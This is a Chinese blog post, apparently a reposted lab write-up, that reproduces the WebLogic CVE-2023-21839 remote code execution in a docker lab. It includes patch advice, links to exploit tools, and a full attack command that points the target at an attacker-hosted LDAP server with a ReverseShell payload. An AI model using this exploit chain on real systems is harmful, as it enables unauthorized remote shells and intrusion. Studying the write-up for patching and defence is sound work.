Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

admin 2023年3月1日20:06:54评论214 views字数 1056阅读3分31秒阅读模式


漏洞阐述

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。1月18日,Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),该漏洞的CVSSv3评分为7.5,可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

解决建议

1、安装Oracle WebLogic Server最新安全补丁:

https://www.oracle.com/security-alerts/cpujan2023.html

2、关闭T3和iiop协议端口,操作方法参考:

https://help.aliyun.com/noticelist/articleid/1060577901.html

影响版本

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

环境搭建

这里推荐使用docker + vulhub 简单粗暴

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2020-14882
Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

这里使用docker在vps上搭建完成后,打开地址http://xx.xx.xx:7001


Weblogic-CVE-2023-21839-远程代码执行复现(排坑)
image-20230301155808571

漏洞复现

先下载利用工具

https://github.com/WhiteHSBG/JNDIExploit
https://github.com/4ra1n/CVE-2023-21839

然后在vps上使用JNDIExp开启ldap协议服务,这里注意 1389跟3456端口开放,然后java最好为低版本,我使用17版本未复现成功,8版本成功复现

Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

同时开启端口监听

Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

在本机使用CVE-2023-21839工具发起exp攻击

Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

main.exe -ip xx.xx.xx.xx -port 7001 -ldap ldap://xx.xx.xx.xx:1389/Basic/ReverseShell/xx.xx.xx.xx/10086

攻击成功

Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

收到shell

Weblogic-CVE-2023-21839-远程代码执行复现(排坑)
image-20230301161326659


原文始发于微信公众号(XK Team):Weblogic-CVE-2023-21839-远程代码执行复现(排坑)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月1日20:06:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic-CVE-2023-21839-远程代码执行复现(排坑)http://cn-sec.com/archives/1582377.html

发表评论

匿名网友 填写信息